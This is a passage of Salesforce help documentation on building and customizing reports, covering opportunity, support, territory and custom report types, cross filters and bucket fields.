Opportunity History Information • From Stage

• Amount

• Last Modified

• To Stage

• Probability (%)

• Last Modified By
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ColumnsObject Information Type

• Close Date

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Opportunity Trends Report

View information about trends shared by the opportunities in your pipeline.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The default settings for this report are:

Format

Matrix

Groupings

The default report shows rows grouped by Historical Stage and columns grouped by As of Date.

Summary Fields

Historical Amount (sum)

Selected Columns

ColumnsObject Information Type

Opportunity Information • Opportunity Name

Opportunity Trend Information • Historical Amount

• As of Date

• Historical Stage
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ColumnsObject Information Type

Opportunity Owner Information • Opportunity Owner Alias

See Also:
Opportunities Reports
The Report Run Page
Limit Report Results
Opportunity Reports
Build a Report From a Template

Create a Custom Opportunity Report

You can create and run custom opportunity reports to include information from associated objects, such as products, partners,
and quotes.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports”To run reports:

“Schedule Reports”To schedule reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. On the Reports tab, click New Report.
2. Select the report type from the Opportunities folder.

• Opportunities Reports
• Opportunities with Products Report
• Opportunities with Contact Roles Report
• Opportunities with Partners Report
• Opportunities with Competitors Report
• Opportunities with Opportunity Teams Report
• Opportunity History Report
• Opportunity Field History Report
• Opportunity Trends Report
• Opportunities with Contact Roles and Products Report
• Opportunities with Opportunity Teams and Products Report
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• Opportunities with Quotes and Quote PDFs Report
• Opportunities with Quotes and Quote Line Items Report

3. Click Create.
4. Select the report's format and columns, and define any filters you want to use.
5. Run the report.

See Also:
Opportunities Reports
Opportunity Reports
Use Standard Opportunity Reports
Tips for Working with Opportunity Reports

Product and Asset Reports

Use product and asset reports to view information about the products your users currently have installed. Find out what assets
your customers have, list the cases filed for a particular asset, or identify assets that aren’t associated with a product.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Special Features of Product and Asset Reports

Consider the following when running product and asset reports:

Standard Reports
Use the Assets without Products report, available from the “Products and Asset Reports” folder to list the assets that are
not associated with a product. Depending on how you use assets, these assets can represent your competitor’s products.

Report Types

• To create a custom report showing what assets your customers have, click New Report from the Reports tab and
choose the Accounts with Assets or Contacts with Assets report type from the Accounts & Contacts report type
category.

• To view a list of the cases filed for a particular asset, click New Report from the Reports tab and choose the Assets
with Cases report type from the Price Books, Products and Assets option.

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template
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Self-Service Reports

Self-Service reports help you analyze the effectiveness of your Self-Service portal. Find out how many cases are being viewed,
how many customers are logging in, or what customers think of the solutions you’re offering.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Standard Reports

• The Self-Service Usage Report gives you information on how many cases are viewed and logged, the number of
comments that have been added, and the number of searches Self-Service users have performed.

• The Self-Service User Report provides information about the customers who are logging into your Self-Service portal,
including the associated account and last login date. You can also include Self-Service fields in any custom contact
report.

• The Helpful Solutions report displays statistics from Self-Service portals that display solutions. On each Self-Service
solution page, customers can indicate whether the solution is helpful. You can use the results of this survey when
choosing the top five solutions for your Self-Service Home page and to verify that customers are able to find the
solutions they need.

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Support Reports

Use support reports to track the number of cases created, case comments, case emails, case owners, case contact roles, cases
with solutions, the length of time since the case last changed status or owner, and the history of case fields.

Available in: All Editions except Database.com (The edition determines which reports you see.)

You can also report on the solutions for your organization, including solution history, the languages in which solutions have
been written, and whether translated solutions are out of date. If you have enabled the Self-Service portal, you can run reports
to track usage of your Self-Service portal.

Special Features of Support Reports

Consider the following when running support reports:

Standard Reports

• Choose the Translated Solutions report to summarize the translated solutions associated with each master solution.
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• Choose the Contact Role report to show all cases with their associated contact roles.
• Choose the Cases with Articles report to see the articles attached to cases. This report is only available if Salesforce

Knowledge is enabled.

The report displays articles even if they're not marked as available for the internal app channel.

Report Types

• You can create a custom report to view a list of cases with milestones by choosing the Cases with Milestones report
type. This report type is only available if entitlements is enabled.

• Choose the Case History and Solution History report types to track the history of standard and custom fields on
cases and solutions where field histories are set up for tracking. Use these reports to see tracked fields' old and new
values. You can't use filter conditions to search the results of the Old Value and New Value fields.

• You can create a custom report to view a list of both inbound and outbound emails by case by choosing the Cases
and Emails report type. This type of report is only available to organizations with Email-to-Case or On-Demand
Email-to-Case enabled.

• You can run case lifecycle reports to view the results of the Range field, which indicates the length of time since the
case last changed status or owner. Each time the status or owner changes, the counter begins again at zero.

Custom Report Types
Use custom report types to define report criteria from which users can run and create reports on entitlements, service
contracts, and contract line items. After entitlement management is enabled, Salesforce automatically includes the
following custom report types:

Report Type LocationDescriptionCustom Report Type

Accounts & ContactsLists accounts with entitlements that
include contacts (named callers).

Accounts with entitlements with
contacts

Customer Support ReportsLists service contracts with contract
line items (products).

Service contracts with contract line
items

Customer Support ReportsLists service contracts with
entitlements.

Service contracts with entitlements

Tips for Support Reports

• You can choose to view the Age of a case in days, hours, or minutes. The age of an open case is the elapsed time
from creation to the present. The age of a closed case is the elapsed time from creation to the closing time of the
case. Note that the age of a case does not take into account any holidays that are associated with the case's business
hours. Holidays suspend business hours during specified dates and times. .

• You can limit any case report to cases owned by users or cases in queues. Choose User Owned Cases or Queue Owned
Cases from the View drop-down at the top of a case report.

• You can create a case report containing contact email addresses, export that data to Excel, and then do a mass mail
merge using Microsoft® Word.

• You can create a custom report on solutions and categories. Select the Category Name field to display the solution’s
category and the Parent Category Name field to display the category directly above the solution’s category.

• If you restrict your report to solutions in a particular category, the report includes only solutions that are directly
associated with that category. It does not include solutions in subcategories of the specified category.

• To report on uncategorized solutions, use the advanced report filters. Choose the Category Name field and the
“equals” operator, and leave the third field blank.
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• When reporting on case comments, use the Public Case Commented field to indicate if the comment is private
or public. Public comments are indicated with a check mark. To limit report results to public comments, customize
the report and add a field filter where Public Case Commented equals True. Likewise, the filter Public
Case Commented equals 0 yields only private case comments.

• When reporting on first-call resolution of cases, add the Closed When Created field to your report. This field
indicates cases that were closed by support reps via the Save & Close button during the creation of the case.

• Choose the Closed by Self-Service User field to report on how many cases have been closed by users via
suggested solutions on the Self-Service portal.

• When reporting on cases, add the Parent Case Number field to your report. This field indicates if a case is
associated with a parent case.

• You can report on case teams in which you are a member. After you run a case report, select My case team's
cases from the Show drop-down.

• Portal users can only report on objects set to Private in the organization-wide default sharing model. Some objects,
such as solutions and articles, are not included in the sharing model and cannot be reported on by Customer Portal
users.

• Owner Role for case reports is defined differently than for other objects. For most objects, Owner Role is defined
in the Role Name as displayed on reports field on the user’s role. Cases uses the Label field instead.

Support Report Fields

In addition to the standard and custom fields for cases and solutions, you can report on the following fields in support reports:

Cases

DescriptionField

The number of cases submitted by Self-Service users via the
Self-Service portal.

(Self-Service Usage Report)

# Cases Submitted

The number of cases viewed by Self-Service users via the
Self-Service portal.

(Self-Service Usage Report)

# Cases Viewed

The number of comments added to all cases by Self-Service
users via the Self-Service portal.

(Self-Service Usage Report)

# Comments Added

The time the case entered an entitlement process.

This field displays if an entitlement process applies to the case.

Entitlement Process Start Time

The time the case exited an entitlement process.

This field displays if an entitlement process applies to the case.

Entitlement Process End Time

A contact enabled to view case information, add comments,
and upload attachments for all cases submitted via the
Self-Service portal by anyone in his or her company.

(Self-Service User Report)

Super User
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Cases

DescriptionField

A checkbox showing a comment was added to a case via the
Self-Service portal.

Self-Service Commented

A checkbox showing a comment has been added to a case via
the Self-Service portal and has not been reviewed by the case
owner.

New Self-Service Comment

A checkbox showing a case was received by email via the
Email-to-Case or On-Demand Email-to-Case feature.

(Cases with Emails Report)

Is Incoming

The age of an open case is the elapsed time from creation to
the present. The age of a closed case is the elapsed time from

Age

creation to the closing time of the case. Note that the age of
a case does not take into account any holidays that are
associated with the case's business hours. Holidays suspend
business hours during specified dates and times.

A checkbox showing a case has a closed status.Closed

A checkbox showing a case was escalated by an escalation rule.Escalated

A checkbox showing a case has comments that may be
displayed via the Self-Service portal.

Public Case Commented

A checkbox showing a case with emails has attachments.

(Cases with Emails Report)

Has Attachment

The value in a tracked case or solution field before it was
changed.

(Case History Report and Solution History Report)

Old Value

The value in a tracked case or solution field after it was
changed.

(Case History Report and Solution History Report)

New Value

The number of business hours that have elapsed since a case
was last updated. Note that holidays are not taken into account

Business Hours

for this field. Holidays suspend business hours during specified
dates and times.

(Case History Report)

The number of hours that elapsed since the same field on a
case was last updated. Note that holidays are not taken into

Business Hours Since Similar Change

account for this field. Holidays suspend business hours during
specified dates and times.

(Case History Report)
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Cases

DescriptionField

The unique identifier for each change tracked on a specified
case or solution field.

(Case History Report and Solution History Report)

History ID

The account associated with the contact on the case. View
together with the Account Name field to see if the account
on the case is different from the account on the contact.

Contact Account Name

The ID of a parent case, which can be used to access a parent
case via the API.

Parent Case ID

Solutions

DescriptionField

The number of solution searches performed by Self-Service
users via the Self-Service portal.

(Self-Service Usage Report)

# Solution Searches

The number of times a solution was viewed in the Self-Service
portal.

Self-Service Access Count

The number of times the survey question “Does this Solution
help you answer your question?” is answered, either positively
or negatively, on a solution in the Self-Service portal.

Self-Service Answer Count

The number of times the survey question “Does this Solution
help you answer your question?” is answered positively on a
solution in the Self-Service portal.

Self-Service Positive Count

The name of the user who originally created the solution.Author

The number of cases associated with the solution.Num Related Cases

Checkbox that indicates whether the solution has a reviewed
status.

Reviewed

The value in a tracked case or solution field before it was
changed.

(Case History Report and Solution History Report)

Old Value

The value in a tracked case or solution field after it was
changed.

(Case History Report and Solution History Report)

New Value

The unique identifier for each change tracked on a specified
case or solution field.

(Case History Report and Solution History Report)

History ID

The language in which the master solution is written.Language
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Solutions

DescriptionField

The language in which the translated solution is written.

(Translated Solutions report)

Translation Language

The unique identifier for each solution.

(Translated Solutions report)

Solution ID

Checkbox that indicates that the translated solution may need
translating to match its master solution.

(Translated Solutions report)

Out of Date

The title of the master solution. Displays up to 250 characters.Master Solution Title

The title of the translated solution. Displays up to 250
characters.

Translated Solution Title

The solution details of the master solution. Displays up to
1000 characters.

Master Solution Details

The solution details of the translated solution. Displays up to
1000 characters.

Translated Solution Details

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Territory Reports

Use territory reports to analyze your sales territories. Identify which users have been assigned to which territories, which users
have been assigned more than one territory, or which users have no territories.

Available in: Enterprise, Unlimited, and Developer Editions

Special Features of Territory Reports

Consider the following when running territory reports:

Standard Reports

• The territory report lists all territories in your organization. Select No Users in the Users drop-down list and click
Run Report to see the territories in your organization that do not have any assigned users.

• The User Territory report, User Multiple Territory report, and User Missing Territory report summarize the users
who have been assigned to any territories, more than one territory, or no territories, respectively.
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• The Account Territory report, Account Multiple Territory report, and Account Missing Territory report summarize
the accounts that have been assigned to any territories, more than one territory, or no territories, respectively.

• The Opportunity Territory report summarizes the opportunities that are in territories. To see opportunities owned
by users who are not currently active in the opportunity's territory, customize the Opportunity Territory report with
the following advanced filter: Active in Territory equals “False.” The Opportunity Missing Territory report
summarizes the opportunities that are associated with accounts that do not have a territory.

• Reports run from custom report types that include territories may display results differently than standard reports
that include territories. This is because reports run from custom report types only display results with territories, such
as accounts with territories, whereas standard reports that include territories may display results without territories.
For example, if you select the Account Territory Report, results display accounts without territories. In custom report
types, when using the Territories filter that includes territories, Multiple Territories or Missing Territories are
not shown in the report results.

Tips for Territory Reports

• Standard and custom territory fields are available in territory reports. They are also available in account reports,
activity reports that include accounts, opportunity reports, and user reports.

See Also:
Build a Report From a Template
The Report Run Page
Limit Report Results
Build a Report From a Template

Create Your Own Custom Report Type
A report type defines the set of records and fields available to a report based on the relationships between a primary object and
its related objects. Reports display only records that meet the criteria defined in the report type. Salesforce provides a set of
pre-defined standard report types; administrators can create custom report types as well.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Custom Report Types”To create or update custom report types:

“Modify All Data”To delete custom report types:

For example, an administrator can create a report type that shows only job applications that have an associated resume;
applications without resumes won't show up in reports using that type. An administrator can also show records that may have
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related records—for example, applications with or without resumes. In this case, all applications, whether or not they have
resumes, are available to reports using that type.  There is a limit to the total number of custom report types you can create.

See Also:
Get the Right Data into Your Report
Choose Object Relationships for Custom Report Types
Create a Custom Report Type
Manage Custom Report Types
Report Types Tips and Considerations
Edit the Report Field Layout for a Custom Report Type
Set Up a Custom Report Type
How do I know which report type a report is using?
Manage Custom Report Types
How Salesforce Analytics Works

Choose Object Relationships for Custom Report Types

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Custom Report Types”To create or update custom report types:

“Modify All Data”To delete custom report types:

A report type defines the set of records and fields available to a report based on the relationships between a primary object and
its related objects. Reports display only records that meet the criteria defined in the report type.

To add child objects to the report type:

1. Click the box under the primary object.
2. Select a child object. Type in the search box to find objects quickly. Only related objects are shown.
3. For each child object, select one of the following criteria:

• Each "A" record must have at least one related "B" record. Only parent records with child records
are shown in the report.

• "A" records may or may not have related "B" records. Parent records are shown, whether or not they
have child records.

When Users are the primary object, select child objects by field—for example, Accounts (Account Owner) or Accounts
(Created By).

4. Add up to three child objects. The number of children depends on the objects you choose.
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5. Click Save.

See Also:
Create Your Own Custom Report Type
Manage Custom Report Types
Create Your Own Custom Report Type
Report Types Tips and Considerations

Create a Custom Report Type

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Custom Report Types”To create or update custom report types:

“Modify All Data”To delete custom report types:

A report type defines the set of records and fields available to a report based on the relationships between a primary object and
its related objects. Reports display only records that meet the criteria defined in the report type.

To create a custom report type:

1. From Setup, click Create > Report Types.
2. Click New Custom Report Type.
3. Select the Primary Object for your custom report type. You can choose from all objects—even those you don't have

permission to view. This lets you build report types for a variety of users. Once you save a report type, you can't change
the primary object.

4. Enter the Report Type Label and the Report Type Name. The label can be up to 255 characters long. The name
is used by the SOAP API.

5. Enter a description for your custom report type, up to 1000 characters long. It's extremely important to provide a meaningful
description so users have a good idea of which data is available for reports. For example: Accounts with Contacts.
Report on accounts and their contacts. Accounts without contacts are not shown..

6. Select the category to store the custom report type in.
7. Select a Deployment Status:

• Choose In Development during design and testing, as well as editing. The report type and its reports are hidden
from all users, except those with the “Manage Custom Report Types” permission. Only users with that permission can
create and run reports using report types in development.

• Choose Deployed when you're ready to let all users access the report type.

Note: A custom report type's Deployment Status changes from Deployed to In Development if its
primary object is a custom object whose Deployment Status similarly changes.

8. Click Next.
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Note: A developer can edit a custom report type in a managed package after it is released, and add new fields.
Subscribers automatically receive these changes when they install a new version of the managed package. However,
developers can’t remove objects or fields from the report type once the package is released.

See Also:
Create Your Own Custom Report Type
Manage Custom Report Types
Create Your Own Custom Report Type
Report Types Tips and Considerations
Choose Object Relationships for Custom Report Types

Manage Custom Report Types

After you create a custom report type, you can customize, edit, and delete it.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Custom Report Types”To create or update custom report types:

“Modify All Data”To delete custom report types:

From Setup, click Create > Report Types to display the All Custom Report Types page, which shows the list of custom report
types defined for your organization.

From the All Custom Report Types page, you can:

• Select a list view from the View drop-down list to go directly to that list page, or click Create New View to define your
own custom view.

• Define a new custom report type by clicking New Custom Report Type.

• Update a custom report type's name, description, report type category, and deployment status by clicking Edit next to a
custom report type's name.

• Delete a custom report type by clicking Del next to the custom report type's name. All the data stored in the custom report
type will be deleted and cannot be restored from the Recycle Bin.

Important:  When you delete a custom report type, any reports based off it will also be deleted. Furthermore, any
dashboard components created from a report based off of a deleted custom report type display an error message
when viewed.

• Display detailed information about a custom report type and customize it further by clicking a custom report type's name.
After you click a custom report type name you can:

◊ Update which object relationships a report can display when run from the custom report type.

◊ Edit the page layout of the custom report type to specify which standard and custom fields a report can display when
created or run from the custom report type.
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◊ See how the fields display to users in reports run from the custom report type by clicking Preview Layout on the Fields
Exposed for Reporting section.

◊ Create a new custom report type with the same object relationships and fields as the selected custom report type by
clicking Clone.

◊ Rename fields in the report.

◊ Set which fields are selected by default.

Note: If the Translation Workbench is enabled for your organization, you can translate custom report types for
international users.

See Also:
Create Your Own Custom Report Type
Create a Custom Report Type
Create Your Own Custom Report Type
Edit the Report Field Layout for a Custom Report Type

Report Types Tips and Considerations

Before you begin creating custom report types for your organization, review these tips and limitations.

Defining Report Types

Consider the following when defining report types:

• If the primary object on a report type is a custom object, and the custom object is deleted, then the report type and any
reports created from it are automatically deleted. Report types associated with custom objects in the Deleted Custom
Objects list count against the maximum number of custom report types you can create.

• If you remove an object from a report type, all references to that object and its associated objects are automatically removed
from reports and dashboards based on that type.

• Custom report types have some limits on the number of items included:

◊ A custom report type can contain up to 60 object references. These objects can be used as the main four objects, as
sources of fields via lookup, or as objects used to traverse relationships. Each referenced object counts toward the
maximum limit even if no fields are chosen from it. For example, if you do a lookup from account to account owner to
account owner’s role, but select no fields from account owner, all the referenced objects still count toward the limit of
60.

◊ You can add up to 1000 fields to each custom report type. A counter at the top of the Page Layout step shows the
current number of fields included. If you have too many fields, you can't save the layout.

◊ You can't add forecasts to custom report types.
◊ You can't add the following fields to custom report types:

- Product schedule fields
- History fields
- Person account fields
- The Age field on cases and opportunities

◊ Reports run from custom report types that include cases do not display the Units drop-down list, which allows users
to view the time values of certain case fields by hours, minutes, or days.
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Choosing Object Relationships

• You can create custom report types from which users can report on your organization's reports and dashboards. When
defining a custom report type, select Reports or Dashboards from the Primary Object drop-down list on the New
Custom Report Type page.

• Preselect commonly used fields via a custom report type by clicking Edit Properties on the field layout, and then selecting
the Checked by Default checkbox next to the field.

• Reduce the amount of time it takes a user to find fields to report on by grouping similar fields together on custom report
types' field layouts. Furthermore, you can create new page sections in which to group fields that are related to one another.
Additionally, you can group fields to match specific detail pages and record types.

• A custom report type can contain up to 60 object references. For example, if you select the maximum limit of four object
relationships for a report type, then you could select fields via lookup from an additional 56 objects. However, users will
receive an error message if they run a report from a custom report type and the report contains columns from more than
20 different objects.

• Note the following about selecting the child object relationship:

◊ If you select that object A may or may not have object B, then all subsequent objects automatically include the
may-or-may-not association on the custom report type. For example, if accounts are the primary object and contacts
are the secondary object, and you choose that accounts may or may not have contacts, then any tertiary and quaternary
objects included on the custom report type default to may-or-may-not associations.

◊ Blank fields display on report results for object B when object A does not have object B. For example, if a user runs a
report on accounts with or without contacts, then contact fields display as blank for accounts without contacts.

◊ On reports where object A may or may not have object B, you can't use the OR condition to filter across multiple
objects. For example, if you enter filter criteria Account Name starts with M OR Contact First Name
starts with M, an error message displays informing you that your filter criteria is incorrect.

◊ The Row Limit option on tabular reports shows only fields from the primary object on reports created from custom
report types where object A may or may not have object B. For example, in an accounts with or without contacts report,
only fields from accounts are shown. Fields from objects after a may-or-may-not association on custom report types
aren't shown. For example, in an accounts with contacts with or without cases report, only fields from accounts and
contacts are available to use. Also, existing reports may not run or disregard the Row Limit settings if they were created
from custom report types where object associations changed from object A with object B to object A with or without
object B.

See Also:
Create Your Own Custom Report Type
Create a Custom Report Type
Choose Object Relationships for Custom Report Types
Opportunity Reports

Edit the Report Field Layout for a Custom Report Type

After you define a custom report type and choose its object relationships, you can specify the standard and custom fields a
report can display when created or run from a custom report type.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

2664

Gather Data with ReportsGather Data



User Permissions Needed

“Manage Custom Report Types”To create or update custom report types:

“Modify All Data”To delete custom report types:

Note:  Custom fields don’t appear in custom report types unless they’ve been added to that report type’s page layout.

1. From Setup, click Create > Report Types to display the All Custom Report Types page.
2. Select the name of a custom report type.
3. Click Edit Layout on the Fields Available for Reports section.

Note:  You can click Preview Layout to preview which fields will display on the Select Columns page of a report
customized or run from this report type. When previewing the layout, all fields and objects are displayed, including
fields and objects you may not have permission to access. However, you cannot access any data stored in the fields
or objects that you do not have permission to access.

4. Select fields from the right-hand box and drag them to a section on the left.

You can view a specific object's fields by selecting an object from the View drop-down list.

5. Optionally, click Add fields related via lookup to display the Add Fields Via Lookup overlay, from which you can add
fields via the lookup relationship the object selected in the View drop-down list has to other objects.

• A lookup field is a field on an object that displays information from another object. For example, the Contact Name
field on an account.

• A custom report type can contain fields available via lookup through four levels of lookup relationships. For example,
for an account, you can get the account owner, the account owner's manager, the manager's role, and that role's parent
role.

• You can only add fields via lookup that are associated with objects included in the custom report type. For example, if
you add the accounts object to the custom report type, then you can add fields from objects to which accounts have a
lookup relationship.

• Selecting a lookup field on the Add Fields Via Lookup overlay may allow you to access additional lookup fields from
other objects to which there is a lookup relationship. For example, if you select the Contact Name field from cases,
you can then select the Account field from contacts because accounts have a lookup relationship to contacts which
have a lookup relationship to cases.

You can access up to four levels of object relationships via lookup.

• The fields displayed in the Add Fields Via Lookup overlay do not include lookup fields to primary objects. For example,
if accounts are the primary object on your custom report type, and contacts are the secondary object, then the Add
Fields Via Lookup overlay does not display lookup fields from contacts to accounts.

• Fields added to the layout via the Add fields related via lookup link are automatically included in the section of the
object from which they are a lookup field. For example, if you add the Contact field as a lookup from accounts, then
the Contact field is automatically included in the Accounts section. However, you can drag a field to any section.

• Fields added via lookup automatically display the lookup icon on the field layout of the custom report type.
• If you include activities as the primary object on a custom report type, then you can only add lookup fields from activities

to accounts on the select column layout of the custom report type.
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A custom report type can contain up to 60 object references. For example, if you select the maximum limit of four object
relationships for a report type, then you could select fields via lookup from an additional 56 objects. However, users will
receive an error message if they run a report from a custom report type and the report contains columns from more than
20 different objects.

6. Arrange fields on sections as they should appear to users. Fields not dragged onto a section will be unavailable to users
when they generate reports from this report type.

You can add up to 1000 fields to each custom report type.

7. Click Preview Layout and use the legend to determine which fields are included on the layout, added to the report by
default, and added to the layout via a lookup relationship.

Warning:  Users can view roll-up summary fields on reports that include data from fields they do not have access
to view. For example, a user that does not have access to view the Price field on an opportunity product can view
the Total Price field on opportunity reports if he or she has access to the Total Price field.

8. To rename or set which fields are selected by default for users, select one or more fields and click Edit Properties.

• Click the Checked by Default checkbox next to the field you want selected by default.

Fields selected by default automatically display the checkbox icon ( ) on the field layout of the custom report type.

• Change the text in the Display As field next to the field you want to rename.

Note: Renamed fields from standard objects, as well as renamed standard objects, do not display as such on
the field layout of the custom report type. However, renamed fields from standard objects and renamed standard
objects do display their new names on the report and the preview page, which you can access by clicking
Preview Layout.

9. To rename the sections, click Edit next to an existing section, or create a new section by clicking Create New Section.
10. Click Save.

See Also:
Create Your Own Custom Report Type
Manage Custom Report Types
Create Your Own Custom Report Type
Create a Custom Report Type

Set Up a Custom Report Type

Set up a custom report type by choosing its child objects and relationships, editing its page layout, and creating a report with
that report type.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Manage Custom Report Types”To create or update custom report types:

“Modify All Data”To delete custom report types:

A report type defines the set of records and fields available to a report based on the relationships between a primary object and
its related objects. Reports display only records that meet the criteria defined in the report type.

To set up a custom report type:

1. Create a custom report type.
2. Choose the child objects and relationships.
3. Edit the layout.
4. Create a report using the report type to make sure it has the fields users need.

When you finish testing, deploy it to users by setting

Deployment Status to Deployed.
5. Optionally, you can do the following:

• Add the custom report type to apps you upload to Force.com AppExchange.
• Users designated as a translator with the “View Setup and Configuration” permission can translate custom report types

using the Translation Workbench.

See Also:
Create Your Own Custom Report Type
Create Your Own Custom Report Type
Report Types Tips and Considerations
Create a Custom Report in Accessibility Mode
Create a Custom Report Type
Edit the Report Field Layout for a Custom Report Type
Choose Object Relationships for Custom Report Types

How do I know which report type a report is using?

When you edit a report, you can see the report type displayed above the report name in report builder. The report type isn't
displayed on the report run page.

1. Report type
2. Report name

See Also:
Create Your Own Custom Report Type
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Report on Related Objects with Cross Filters
Use a cross filter to fine-tune your results by including or excluding records from related objects, without having to write
formulas or code. You can apply cross filters by themselves, or in combination with field filters.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Watch a Demo: Using Cross Filters in Reports (2:40)

To change a report filter, hover over it and click Edit or Remove. Your filters display when you run your report; click Edit
on that page to make additional changes.

Add subfilters to further filter by fields on the child object. For example, if you have a cross filter of Accounts with
Opportunities, click Add Opportunity Filter and create the Opportunity Nameequals ACME subfilter to see just
those opportunities. You can create up to five subfilters for each cross filter.

• Each report can have up to three cross filters.

• Each cross filter can have up to five subfilters.

• Filter logic applies only to field filters, not cross filters.

See Also:
Get the Right Data into Your Report
Create a Cross Filter
Example: Using WITH in Cross Filters
Example: Using WITHOUT in Cross Filters
Example: Using Multiple Cross Filters
Tips for Working with Cross Filters
Filter Choices
Filter Your Report Data
Create a Cross Filter

Create a Cross Filter

Use cross filters to include or exclude records in your report results based on related objects and their fields.

Available in: Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Watch a Demo: Using Cross Filters in Reports (2:40)

1. In the Filters pane of report builder, click Add > Cross Filter.
2. Select a parent object from the drop-down list. Your choice determines which related objects you see in the child object

list.

Tip:  In report types based on Campaigns, the parent object can be the secondary object in the report type. For
example, in a “Campaigns with Leads” report, the parent object can be Campaigns or Leads.

3. Choose with or without.
4. Select a child object from the drop-down or search by its name. The drop-down list contains all eligible child objects of

your selected parent object.
5. Optionally add subfilters:

a. Click Add Your Related Child Object Filter.
b. Select a field. The fields are determined by the child object in the cross filter. For example, if your cross filter is

Accounts with Cases, you can use case fields for your subfilter.
c. Choose a filter operator.
d. Enter a value.

6. Click OK.

See Also:
Report on Related Objects with Cross Filters
Example: Using Multiple Cross Filters
Example: Using WITH in Cross Filters
Example: Using WITHOUT in Cross Filters

Example: Using WITH in Cross Filters

Use cross filters to filter a report by an object's child objects using WITH conditions. For example, filter a report to show just
accounts with cases.

Available in: Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Let's say a recent campaign in California won you a lot of new customers. You want to ensure that their customer cases get
resolved quickly. You can create a report to see which of those accounts currently have cases.

1. Create a new report. For the report type, click Accounts & Contacts, select Accounts, and click Create.
2. In the report builder's Filters pane, set the appropriate standard filters.
3. Create a field filter where Billing State/Province equals CA and click OK.
4. Click Add > Cross Filter and specify Accounts with Cases.

When you click Run Report, the results will include only California accounts with an associated case.

See Also:
Report on Related Objects with Cross Filters
Create a Cross Filter

Example: Using WITHOUT in Cross Filters

Use cross filters to filter a report by an object's child objects using WITHOUT conditions. For example, filter a report to show
just contacts without activities.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Let's say that you've just imported a list of California accounts and you want to find which ones are missing contacts before
you assign owners:

1. Create a new report. For the report type, click Accounts & Contacts, select Accounts, and click Create.
2. In the report builder's Filters pane, set the appropriate standard filters.
3. Create a field filter where Billing State/Province equals CA and click OK.
4. Click Add > Cross Filter and specify Accounts without Contacts.
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When you click Run Report, the results will include only California accounts without an associated contact.

See Also:
Report on Related Objects with Cross Filters
Create a Cross Filter

Example: Using Multiple Cross Filters

Use cross filters to filter a report by an object's child objects using both WITH and WITHOUT conditions. For example,
filter a report to show accounts that have cases but don’t have activities.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Say you’re a salesperson who wants to see which customer accounts have unresolved problem escalations because you want to
ensure your support team takes care of them.

1. Create a new report. For the report type, click Accounts & Contacts, select Accounts, and click Create.
2. In the report builder's Filters pane, set the appropriate standard filters.
3. To limit your report to customer accounts, click Add > Field Filter and specify Type equals Customer.
4. To see which accounts have no activities, click Add > Cross Filter and specify Accounts without Activities.
5. To see only accounts without completed activities, add a subfilter to your cross filter:

a. Click Add Activities Filter and specify Status equals Completed.
b. Click OK.

6. To include your accounts that currently have cases, add another cross filter but this time specify Accounts with Cases.
7. To exclude cases that were not escalated, add a subfilter to this cross filter:

a. Click Add Cases Filter and specify Type equals Problem.
b. Click Add Cases Filter again, but this time specify Status equals Escalated.
c. Click OK.

When you run the report, it will include only customer accounts without completed activities with escalated cases.

See Also:
Report on Related Objects with Cross Filters
Create a Cross Filter
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Tips for Working with Cross Filters

Cross filters work like ordinary filters, but they have some special characteristics of their own.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

• Adding cross filters can potentially slow down your report. To avoid having the report or preview time out, limit the data
returned by setting filters. For example, select My opportunities for Show and Current FQ for Range instead of
viewing all opportunities for all time.

• Since the objects available in cross filters depend on the parent object of the report type you choose, consider the related
child objects before selecting a report type. For example, choose the Accounts report type to filter on Accounts with
Partners because Partner is a child object of Account.

• Cross filters work in conjunction with your report type selection. Cross filters have an AND relationship with the report
type you select. Therefore, choosing a report type of Accounts with Partners and adding a cross filter for Accounts
without Partners will yield no results.

• Report builder is required to create or edit cross filters. Without it, you can run reports with cross filters, but you can’t
create or edit them.

See Also:
Report on Related Objects with Cross Filters
Example: Using Multiple Cross Filters
Create a Cross Filter
Example: Using WITH in Cross Filters
Example: Using WITHOUT in Cross Filters

Categorize Data Quickly with Buckets
Bucketing lets you quickly categorize report records without creating a formula or a custom field. When you create a bucket
field, you define multiple categories (buckets) used to group report values.

Available in: Enterprise, Unlimited, and Developer Editions

Watch a Demo: Getting Started with Buckets (3:00 minutes)
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Bucketing lets you quickly categorize report records without creating a formula or a custom field. For example, create a bucket
field named Size based on the # Employees field. Then, create buckets that group records into “Large,” “Medium,” or
“Small” ranges that you define. Bucket fields can be used like any other field to sort, filter, and group your report.

Note:  Report builder is required to create or edit buckets. Without it, you can run reports with buckets, but you can’t
create or edit them.

See Also:
Get the Right Data into Your Report
Add a Bucket Field
Edit a Bucket Field
